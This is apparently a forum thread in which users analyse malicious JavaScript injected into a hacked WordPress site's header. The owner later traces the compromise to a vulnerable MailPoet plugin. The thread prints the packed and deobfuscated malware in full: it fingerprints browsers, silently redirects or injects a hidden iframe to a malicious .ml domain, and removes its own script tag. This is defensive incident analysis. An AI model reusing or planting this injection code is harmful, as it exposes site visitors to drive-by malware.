Suspicious JavaScript in website header
It seems that the "actual code" you posted is packed using http://matthewfl.com/unPacker.html. When you unpacked it you obtain
var jxPogLroeXQvpXkmguljZoGSNnIQKQUt=setInterval(function()
{
if(document.body!=null&&typeof document.body!="undefined")
{
clearInterval(jxPogLroeXQvpXkmguljZoGSNnIQKQUt);
if(typeof window["v_bd66b32e1bc6ad91e01318e8278918f0"]=="undefined")
{
window["v_bd66b32e1bc6ad91e01318e8278918f0"]=1;
var CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym=(JqFOWeGJVjglgXJgbmWMOOgrzOjmywAyo()&&iQDjSrUavDhsaZpAGAdpuicNIitAQcswtAX());
var nfxiKffyQjEHIifZBNIfZPyvuVAKXQAWejKxfkfeh=!CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym&&!!window.chrome&&window.navigator.vendor==="Google Inc.";
var ZLuhoXzddcRRJFsZItJJdsiHYGGoAUT=-1;
var XfXhEPJoDqiyfeRjmbanzQnFJBmCNSefHcmzrl="http://miwkavoriwka.ml/052F";
if(LCHqSJXhIyudrWzobJDSCoYggFqaOJuRicOo()&&ZLuhoXzddcRRJFsZItJJdsiHYGGoAUT==1)
{
if((navigator.userAgent.match(/iPhone/i))||(navigator.userAgent.match(/iPod/i)))
{
location.replace(XfXhEPJoDqiyfeRjmbanzQnFJBmCNSefHcmzrl)
}
else
{
window.location=XfXhEPJoDqiyfeRjmbanzQnFJBmCNSefHcmzrl;
document.location=XfXhEPJoDqiyfeRjmbanzQnFJBmCNSefHcmzrl
}
}
else
{
if((CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym&&!nfxiKffyQjEHIifZBNIfZPyvuVAKXQAWejKxfkfeh&&!LCHqSJXhIyudrWzobJDSCoYggFqaOJuRicOo()))
{
var DesUquKQJgBZjosSHPWcRVgzymaWwrEImVixoHt="<div style=\"position:absolute;
left:-2630px;
\"><iframe width=\"21px\" src=\""+XfXhEPJoDqiyfeRjmbanzQnFJBmCNSefHcmzrl+"\" height=\"21px\"></iframe></div>";
var lRaFfKMjehAqqYVjWLZYWayXQpFbgHLLUunc=document.getElementsByTagName("div");
if(lRaFfKMjehAqqYVjWLZYWayXQpFbgHLLUunc.length==0)
{
document.body.innerHTML=document.body.innerHTML+DesUquKQJgBZjosSHPWcRVgzymaWwrEImVixoHt
}
else
{
var dl_name=lRaFfKMjehAqqYVjWLZYWayXQpFbgHLLUunc.length;
var mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy=Math.floor((dl_name/2));
lRaFfKMjehAqqYVjWLZYWayXQpFbgHLLUunc[mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy].innerHTML=lRaFfKMjehAqqYVjWLZYWayXQpFbgHLLUunc[mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy].innerHTML+DesUquKQJgBZjosSHPWcRVgzymaWwrEImVixoHt
}
}
}
}
pIooJuskHsSJnnXgfiVEvsFqqcqXQQjo()
}
}
,100);
function pIooJuskHsSJnnXgfiVEvsFqqcqXQQjo()
{
var vgZvyjCdzDWwBudHEktBnaagYYYbnZxB="id_8807906";
if(vgZvyjCdzDWwBudHEktBnaagYYYbnZxB!="none")
{
var ZkGIDYCRWYyiJYOUJJcrnHHcKbhOZqNAkKJD=document.getElementById(vgZvyjCdzDWwBudHEktBnaagYYYbnZxB);
if(typeof ZkGIDYCRWYyiJYOUJJcrnHHcKbhOZqNAkKJD!=undefined&&ZkGIDYCRWYyiJYOUJJcrnHHcKbhOZqNAkKJD!=null)
{
ZkGIDYCRWYyiJYOUJJcrnHHcKbhOZqNAkKJD.outerHTML="";
delete ZkGIDYCRWYyiJYOUJJcrnHHcKbhOZqNAkKJD
}
}
};
function iQDjSrUavDhsaZpAGAdpuicNIitAQcswtAX()
{
if(document.all&&!document.compatMode)
{
return true
}
else if(document.all&&!window.XMLHttpRequest)
{
return true
}
else if(document.all&&!document.querySelector)
{
return true
}
else if(document.all&&!document.addEventListener)
{
return true
}
else if(document.all&&!window.atob)
{
return true
}
else if(document.all)
{
return true
}
else if(typeof navigator.maxTouchPoints!="undefined"&&!document.all&&JqFOWeGJVjglgXJgbmWMOOgrzOjmywAyo())
{
return true
}
else
{
return false
}
}
function JqFOWeGJVjglgXJgbmWMOOgrzOjmywAyo()
{
var zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY=window.navigator.userAgent;
var TAbiLSYVvuNwIiiXwiIQnfLCxaBCrsouSxrSuH=zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf("MSIE ");
if(TAbiLSYVvuNwIiiXwiIQnfLCxaBCrsouSxrSuH>0)
{
return parseInt(zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.substring(TAbiLSYVvuNwIiiXwiIQnfLCxaBCrsouSxrSuH+5,zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf(".",TAbiLSYVvuNwIiiXwiIQnfLCxaBCrsouSxrSuH)),10)
}
var fvqjbsMLZwQhjFmZywfJpPJBvaYNNPAbkM=zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf("Trident/");
if(fvqjbsMLZwQhjFmZywfJpPJBvaYNNPAbkM>0)
{
var AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA=zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf("rv:");
return parseInt(zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.substring(AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA+3,zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf(".",AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA)),10)
}
var REVLGqfpuneuaaJEXHSGpWnQjZaZVSkF=zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf("Edge/");
if(REVLGqfpuneuaaJEXHSGpWnQjZaZVSkF>0)
{
return parseInt(zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.substring(REVLGqfpuneuaaJEXHSGpWnQjZaZVSkF+5,zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf(".",REVLGqfpuneuaaJEXHSGpWnQjZaZVSkF)),10)
}
return false
}
function LCHqSJXhIyudrWzobJDSCoYggFqaOJuRicOo()
{
var pKJQtNwdoBZJNpjycIXWoUpkeifUIrZlE=window.navigator.userAgent.toLowerCase();
if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(pKJQtNwdoBZJNpjycIXWoUpkeifUIrZlE)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(pKJQtNwdoBZJNpjycIXWoUpkeifUIrZlE.substr(0,4)))
{
return true
}
return false
}
Which is still obfuscated a bit by using "random" variable name. Still you can see that the code is trying to redirect you to :
hxxp://miwkavoriwka.ml/052F
Anyone know what this site is for?
I deobfuscated the code a bit:
var interval = setInterval(function() {
if (document.body != null && typeof document.body != "undefined") {
clearInterval(interval);
// only do once per page load
if (typeof window["v_bd66b32e1bc6ad91e01318e8278918f0"] == "undefined") {
window["v_bd66b32e1bc6ad91e01318e8278918f0"] = 1;
// mobile ?
var CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym = (test_for_sepcific_user_agents() && some_capability_check());
// android ?
var nfxiKffyQjEHIifZBNIfZPyvuVAKXQAWejKxfkfeh = !CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym && !!window.chrome && window.navigator.vendor === "Google Inc.";
var ZLuhoXzddcRRJFsZItJJdsiHYGGoAUT = -1;
var payload_addr = "http://miwkavoriwka.ml/052F";
// This branch is never used because -1 != 1
if (is_mobile_phone() && ZLuhoXzddcRRJFsZItJJdsiHYGGoAUT == 1) {
if ((navigator.userAgent.match(/iPhone/i)) || (navigator.userAgent.match(/iPod/i))) {
location.replace(payload_addr)
} else {
window.location = payload_addr;
document.location = payload_addr
}
} else {
if ((CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym && !nfxiKffyQjEHIifZBNIfZPyvuVAKXQAWejKxfkfeh && !is_mobile_phone())) {
var frame_div = "<div style=\"position:absolute;left:-2630px;\"><iframe width=\"21px\" src=\"" + payload_addr + "\" height=\"21px\"></iframe></div>";
var divs = document.getElementsByTagName("div");
if (divs.length == 0) {
document.body.innerHTML = document.body.innerHTML + frame_div
} else {
var dl_name = divs.length;
// why ?
var mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy = Math.floor((dl_name / 2));
divs[mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy].innerHTML = divs[mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy].innerHTML + frame_div
}
}
}
}
remove_script()
}
}, 100);
function remove_script() {
// Remove the script (myself)
var some_id = "id_8807906";
if (some_id != "none") {
var some_element = document.getElementById(some_id);
if (typeof some_element != undefined && some_element != null) {
some_element.outerHTML = "";
delete some_element
}
}
};
// some capability check
// POssible another mobile phone check ?
function some_capability_check() {
if (document.all && !document.compatMode) {
return true
} else if (document.all && !window.XMLHttpRequest) {
return true
} else if (document.all && !document.querySelector) {
return true
} else if (document.all && !document.addEventListener) {
return true
} else if (document.all && !window.atob) {
return true
} else if (document.all) {
return true
} else if (typeof navigator.maxTouchPoints != "undefined" && !document.all && test_for_sepcific_user_agents()) {
return true
} else {
return false
}
}
function test_for_sepcific_user_agents() {
var user_agent = window.navigator.userAgent;
var user_agent_msi_index = user_agent.indexOf("MSIE ");
if (user_agent_msi_index > 0) {
return parseInt(user_agent.substring(user_agent_msi_index + 5, user_agent.indexOf(".", user_agent_msi_index)), 10)
}
var user_agent_trident_index = user_agent.indexOf("Trident/");
if (user_agent_trident_index > 0) {
var AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA = user_agent.indexOf("rv:");
return parseInt(user_agent.substring(AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA + 3, user_agent.indexOf(".", AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA)), 10)
}
var user_agent_edge_index = user_agent.indexOf("Edge/");
if (user_agent_edge_index > 0) {
return parseInt(user_agent.substring(user_agent_edge_index + 5, user_agent.indexOf(".", user_agent_edge_index)), 10)
}
return false
}
function is_mobile_phone() {
var user_agent = window.navigator.userAgent.toLowerCase();
if (/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(user_agent) || /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(user_agent.substr(0, 4))) {
return true
}
return false
}
It loads h**p://miwkavoriwka.ml/052F (which is already on some blacklists, inclusive FFs Phishing and Malware Protection list) in an iframe or redirect to that url (depending on your browser)
edit: After reading the code a bit: The only browser which seem to be targeted are the ones where this conditions are met:
- Useragents containing MSIE, Trident/ or Edge/
- No mobile phone ? (see function is_mobile_phone)
- Some capability check true (see function some_capability_check)
Thanks for all of the great info and help!
I have since discovered how the site was originally hacked. The site was running an old version of the plugin Mailpoet / wysija-newsletters (pre 2.6.7)
Using an exploit in this plugin the attacker managed to upload malicious code which was then used to further infect the site.
https://blog.sucuri.net/2014/07/remote-file-upload-vulnerability-on-mailpoet-wysija-newsletters.html
Ultimately the security issue with Mailpoet / wysija-newsletters was used to upload a file called .zip to /wp-content/uploads/wysija/temp and then extract the zip and install some dodgy themes. The attached screenshot shows what happened when going into the plugins admin page after the zip had been deleted. It seems that whenever going into wp-admin the site would get reinfected.
The site has now been restored from a clean version, fully patched and the plugin WordFence is running.
